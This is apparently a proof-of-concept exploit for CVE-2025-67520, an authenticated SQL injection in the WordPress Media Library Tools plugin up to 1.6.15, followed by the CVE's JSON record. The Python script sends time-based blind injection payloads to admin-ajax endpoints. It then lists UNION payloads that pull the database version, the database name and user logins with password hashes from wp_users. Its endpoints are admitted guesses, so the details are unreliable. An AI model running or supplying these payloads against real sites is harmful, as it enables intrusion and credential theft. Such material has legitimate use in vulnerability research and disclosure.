CVE-2025-67520

# CVE-2025-67520 SQL Injection PoC # Target: WordPress Media Library Tools Plugin <= 1.6.15 # Author: Security Researcher # Note: Requires high privileges (admin/editor/author) import requests import sys from urllib.parse import quote TARGET_URL = "http://target-wordpress-site.com" # Authentication cookies (requires authenticated session) COOKIES = { "wordpress_test_cookie": "WP+Cookie+check", "wordpress_logged_in_[hash]": "user_session_token" } def test_sql_injection(): """Test for SQL injection vulnerability""" # Blind SQL injection payload - time-based # Adjust the sleep duration based on database type payload = "1' AND (SELECT * FROM (SELECT(SLEEP(5)))a) AND '1'='1" # Common vulnerable parameter - adjust based on actual endpoint vulnerable_params = [ "/wp-admin/admin-ajax.php?action=mlt_get_attachments", "/wp-admin/admin-ajax.php?action=mlt_search", "/wp-admin/admin-ajax.php?action=mlt_bulk_action" ] headers = { "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest" } for endpoint in vulnerable_params: url = TARGET_URL + endpoint data = { "ids[]": payload, # or other parameter "nonce": "attacker_known_or_bypassed_nonce" } try: print(f"[*] Testing endpoint: {endpoint}") response = requests.post(url, data=data, cookies=COOKIES, headers=headers, timeout=30) print(f"[+] Response status: {response.status_code}") except requests.exceptions.Timeout: print("[!] Request timed out - potential SQL injection confirmed") return True except Exception as e: print(f"[-] Error: {e}") return False def extract_data(): """Extract database information using UNION-based injection""" # Database version detection version_payload = "1' UNION SELECT NULL,@@version,NULL,NULL-- -" # Database name extraction database_payload = "1' UNION SELECT NULL,database(),NULL,NULL-- -" # User table extraction users_payload = "1' UNION SELECT NULL,GROUP_CONCAT(user_login,':',user_pass),NULL,NULL FROM wp_users-- -" payloads = [ ("Database Version", version_payload), ("Database Name", database_payload), ("User Credentials", users_payload) ] for desc, payload in payloads: print(f"\n[*] Extracting: {desc}") # Send request with payload # Parse response to extract data print(f"[+] Payload: {payload}") if __name__ == "__main__": print("CVE-2025-67520 SQL Injection Test") print("=" * 50) if test_sql_injection(): print("[!] Vulnerability confirmed!") extract_data() else: print("[-] No vulnerability detected or authentication required")

{"cve": {"id": "CVE-2025-67520", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:25.403", "lastModified": "2026-04-27T18:16:40.563", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Tiny Solutions Media Library Tools media-library-tools allows SQL Injection.This issue affects Media Library Tools: from n/a through <= 1.6.15."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/media-library-tools/vulnerability/wordpress-media-library-tools-plugin-1-6-15-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}